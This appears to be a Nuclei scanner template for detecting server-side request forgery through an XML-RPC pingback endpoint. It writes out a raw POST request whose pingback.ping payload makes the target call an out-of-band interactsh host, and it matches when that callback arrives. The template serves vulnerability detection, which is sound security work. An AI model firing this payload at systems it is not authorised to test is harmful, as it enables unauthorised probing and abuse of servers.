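id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  reference:
    - https://hackerone.com/reports/406387
  tags: ssrf,generic,xmlrpc

requests:
  # The body is an XML-RPC methodCall: method pingback.ping with the
  # interactsh callback URL as its single parameter value.
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value>http://{{interactsh-url}}</value>
            </param>
          </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol  # matches when the target makes an HTTP callback
        words:
          - "http"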